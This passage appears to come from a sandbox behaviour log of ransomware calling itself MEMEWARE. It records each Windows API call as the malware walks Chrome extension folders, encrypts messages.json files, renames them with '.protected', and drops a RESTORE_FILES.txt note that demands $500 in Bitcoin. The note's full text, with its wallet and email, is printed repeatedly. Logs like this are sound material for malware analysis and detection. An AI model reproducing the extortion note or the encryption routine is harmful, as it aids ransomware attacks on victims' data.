pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\*") returned 143 [0081.468] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0081.469] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.469] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.469] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.469] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.469] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.469] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\.") returned 143 [0081.469] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.469] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.469] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.469] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.469] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.469] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.469] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.469] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\..") returned 144 [0081.469] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.469] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.469] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.469] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.469] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.469] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.469] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.469] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.469] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json") returned 155 [0081.469] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.469] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.469] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.469] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.470] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json") returned 155 [0081.470] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.470] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json") returned 155 [0081.470] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.470] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json") returned 155 [0081.470] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.470] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0081.471] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.471] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0081.471] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.471] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.471] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.471] CloseHandle (hObject=0x168) returned 1 [0081.471] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.protected") returned 165 [0081.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.protected")) returned 1 [0081.473] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.473] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.473] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\RESTORE_FILES.txt") returned 159 [0081.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.473] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.473] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.474] lstrlenA (lpString="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") returned 684 [0081.474] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0081.474] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.474] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.474] CloseHandle (hObject=0x164) returned 1 [0081.474] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.474] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0081.474] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0081.474] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0081.474] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0081.474] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0081.474] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt") returned 141 [0081.474] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0081.474] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0081.474] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\*") returned 143 [0081.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.474] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.474] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.474] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.474] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.475] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.475] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\.") returned 143 [0081.475] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.475] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.475] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.475] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.475] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.475] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.475] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.475] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\..") returned 144 [0081.475] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.475] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.475] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.475] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.475] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.475] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0081.475] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.475] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.475] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json") returned 155 [0081.475] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.475] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.475] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.475] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.476] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json") returned 155 [0081.476] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.476] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json") returned 155 [0081.476] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.476] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json") returned 155 [0081.476] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.476] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfd, lpOverlapped=0x0) returned 1 [0081.477] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff03, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.477] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfd, lpOverlapped=0x0) returned 1 [0081.477] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.477] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.477] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.477] CloseHandle (hObject=0x168) returned 1 [0081.477] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.protected") returned 165 [0081.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.protected")) returned 1 [0081.478] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.478] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.478] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\RESTORE_FILES.txt") returned 159 [0081.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.478] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.478] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.479] lstrlenA (lpString="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") returned 684 [0081.479] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0081.479] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.479] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.479] CloseHandle (hObject=0x164) returned 1 [0081.479] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.479] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0081.479] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0081.479] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0081.479] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0081.479] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0081.479] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv") returned 141 [0081.479] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0081.479] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0081.479] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\*") returned 143 [0081.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.479] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.480] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.480] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.480] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.480] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.480] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\.") returned 143 [0081.480] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.480] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.480] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.480] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.480] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.480] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.480] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.480] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\..") returned 144 [0081.480] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.480] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.480] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.480] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.480] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.480] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
